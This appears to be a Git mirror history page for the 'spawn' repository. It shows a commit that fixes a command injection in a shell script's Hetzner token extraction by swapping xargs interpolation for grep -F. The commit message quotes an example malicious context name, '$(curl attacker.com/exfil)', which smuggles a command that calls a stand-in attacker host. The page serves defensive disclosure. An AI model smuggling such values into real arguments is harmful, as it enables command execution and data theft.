spawn

vrr/spawn

mirror of https://github.com/OpenRouterTeam/spawn.git synced 2026-05-15 09:59:46 +00:00

History

A edb475e3d2 security: fix command injection in hetzner token extraction (#1418 ) Fixes #1411 Replaced unsafe xargs -I{} pattern with grep -F for literal string matching to prevent command injection if the hcloud context name contains shell metacharacters. Previous code: xargs interpolated context name directly into grep pattern New code: grep -F treats context name as literal string (no interpretation) Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)' could execute arbitrary commands during token extraction. Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-17 14:08:31 -05:00
..
common.sh	security: fix command injection in hetzner token extraction (#1418 )	2026-02-17 14:08:31 -05:00

security: fix command injection in hetzner token extraction (#1418 )

Fixes #1411

Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.

Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)

Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>

2026-02-17 14:08:31 -05:00

common.sh

security: fix command injection in hetzner token extraction (#1418 )

2026-02-17 14:08:31 -05:00